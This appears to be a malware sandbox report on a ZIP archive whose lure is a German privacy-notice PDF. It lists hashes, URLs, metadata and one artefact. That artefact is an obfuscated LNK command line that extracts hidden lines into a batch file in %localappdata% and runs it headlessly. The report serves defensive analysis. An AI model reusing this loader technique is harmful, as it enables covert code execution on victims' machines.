e9d208ba4ed3f964892964c1357d0e64

ZIP Archive
|
MD5: e9d208ba4ed3f964892964c1357d0e64
|
Size: 9.65 MB
|
application/zip

Infection Chain

Summary by MalvaGPT

Characteristics

Hash	Hash Value
MD5	e9d208ba4ed3f964892964c1357d0e64
Sha1	631e07bebbed03caf1ffde9181d79cfaca8ad631
Sha256	1adc4e56702591a0e4bc913f243a0fa6055f7a7cb3f8eeadf3117b6d2a295885
Sha384	30a2844bfc318146e1f0cae60f3e3acd4242e343a273aff56b22d82db89ed462643250ad828ade60c2df4e764f9f4920
Sha512	373b727b245ff44692e6ece52acb6741201c76e75a45bb6aff762d6ef5b368261d9e3b31b277f18d94177f3ae9c2797b068dcf6f66030d4d6ef1ed3ddc66f0c5
SSDeep	98304:Ge5zEbiPnm5hklruaE5Yv6cyUqwEmHj1O6ZT5OzH9eCDZL7+Ox0MRxR5Sb0MY0AW:Ge5ZPnm5hklronx0MLHSbVYjkh
TLSH	DDA61C5B678CB2E7E10AFE1CED18DB1E37F55B16D1AAE860B74C5C4D90CE602B788610

File Structure

Malware Configuration - URLs in PDF

Config. Field0	Value
URL #1	https://usercentrics.com/de/
URL #2	https://privacy.google.com/businesses/gdprcontrollerterms/
URL #3	https://privacy.google.com/businesses/gdprcontrollerterms/sccs/
URL #4	https://policies.google.com/privacy?hl=de
URL #5	https://policies.google.com/terms?hl=de
URL #6	https://privacy.google.com/businesses/controllerterms/mccs/
URL #7	https://tools.google.com/dlpage/gaoptout?hl=de
URL #8	https://support.google.com/analytics/answer/6004245?hl=de
URL #9	https://policies.google.com/privacy/frameworks
URL #10	https://www.deepmedia.de/datenschutzerklaerung-advertisertag/
URL #11	https://www.instagram.com/hochbahn_/
URL #12	https://www.facebook.com/HamburgerHochbahnAG
URL #13	https://x.com/hochbahn
URL #14	https://norden.social/@hochbahn
URL #15	https://www.xing.com/pages/hamburgerhochbahnag
URL #16	https://www.linkedin.com/company/hamburger-hochbahn-ag
URL #17	https://www.youtube.com/channel/UC2c_Dwq09WgBnrKhKblbNOg
URL #18	https://www.facebook.com/legal/EU_data_transfer_addendum
URL #19	https://help.instagram.com/519522125107875
URL #20	https://de-de.facebook.com/help/566994660333381
URL #21	https://www.facebook.com/legal/terms/page_controller_addendum
URL #22	https://www.facebook.com/settings?tab=ads
URL #23	https://www.facebook.com/about/privacy/
URL #24	https://x.com/settings/account/personalization
URL #25	https://gdpr.x.com/en/controller-to-controller-transfers.html
URL #26	https://x.com/de/privacy
URL #27	https://privacy.xing.com/de/datenschutzerklaerung
URL #28	https://www.linkedin.com/psettings/guest-controls/retargeting-opt-out
URL #29	https://www.linkedin.com/legal/l/dpa
URL #30	https://www.linkedin.com/legal/l/eu-sccs
URL #31	https://www.linkedin.com/legal/privacy-policy
URL #32	https://www.hochbahn.de/de/karriere
URL #33	https://hochbahn.onlyfy.jobs/policy
URL #34	https://privacy.microsoft.com/de-de/privacystatement
URL #35	https://www.dataprivacyframework.gov/

Informations

Name0	Value
Datenschutz_Erklaerung.pdf	1.5
Datenschutz_Erklaerung.pdf	ehernandez
Datenschutz_Erklaerung.pdf	D:20251021113953+02'00'
Datenschutz_Erklaerung.pdf	DATAC Archivprinter V2 (12.2.0.2905)
Datenschutz_Erklaerung.pdf	D:20251021113953+02'00'
Datenschutz_Erklaerung.pdf	Microsoft Word - Dokument1
Datenschutz_Erklaerung.pdf	DATAC Archivprinter V2 / http://www.datac.de / FPG
Datenschutz_Erklaerung.pdf	DATAC Archivprinter V2 / http://www.datac.de / FPG
Datenschutz_Erklaerung.pdf	D:20251021113953+02'00'
Datenschutz_Erklaerung.pdf	D:20251021113953+02'00'
Datenschutz_Erklaerung.pdf	DATAC Archivprinter V2 (12.2.0.2905)
Datenschutz_Erklaerung.pdf	Microsoft Word - Dokument1
Datenschutz_Erklaerung.pdf	ehernandez

Artefacts

Name0	Value
LNK: Command Execution	conhost.exe --headless %cOmSPec% /c cd %temp% && for /f %f in ('dir Datenschutz_Update_2025_2.* /S /B') do findstr /b /r ".confirmedline" %f > %localappdata%\icon_update.bat && forfiles /p %LOCALAPPDATA% /m icon_update. /c "cmd /c @PATH"

e9d208ba4ed3f964892964c1357d0e64 (9.65 MB)

e9d208ba4ed3f964892964c1357d0e64

ZIP Archive | MD5: e9d208ba4ed3f964892964c1357d0e64 | Size: 9.65 MB | application/zip

ZIP Archive
|
MD5: e9d208ba4ed3f964892964c1357d0e64
|
Size: 9.65 MB
|
application/zip